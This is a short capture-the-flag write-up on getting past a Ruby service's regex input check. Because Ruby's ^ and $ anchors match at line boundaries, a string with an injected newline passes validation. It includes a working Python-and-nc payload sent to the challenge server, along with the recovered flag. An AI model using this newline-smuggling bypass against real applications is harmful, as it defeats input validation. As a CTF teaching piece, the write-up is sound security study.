Description

Hi, my name is Ruby. I like converting characters into ascii values and then calculating the sum.

Solution

The problem with Ruby is the way it handles ^ and $. These are treated as \n (new line).

So to exploit this service, all we need to do is to generate a string following these three steps

  1. 10 arbitrary characters
  2. Add a 0x0A or \n
  3. Add some more arbitrary data

Now, just send this string and ruby will happily accept it.

$ python -c 'print "f"*10 + "\x0A" + "fff"' | nc 188.166.133.53 12037
Let me count the ascii values of 10 characters:
Sum is: 1336
IW{RUBY_R3G3X_F41L}

Flag: IW{RUBY_R3G3X_F41L}

References

Egor Homakov - Injects in Various Ruby Websites Through Regexp.

Rekt Sec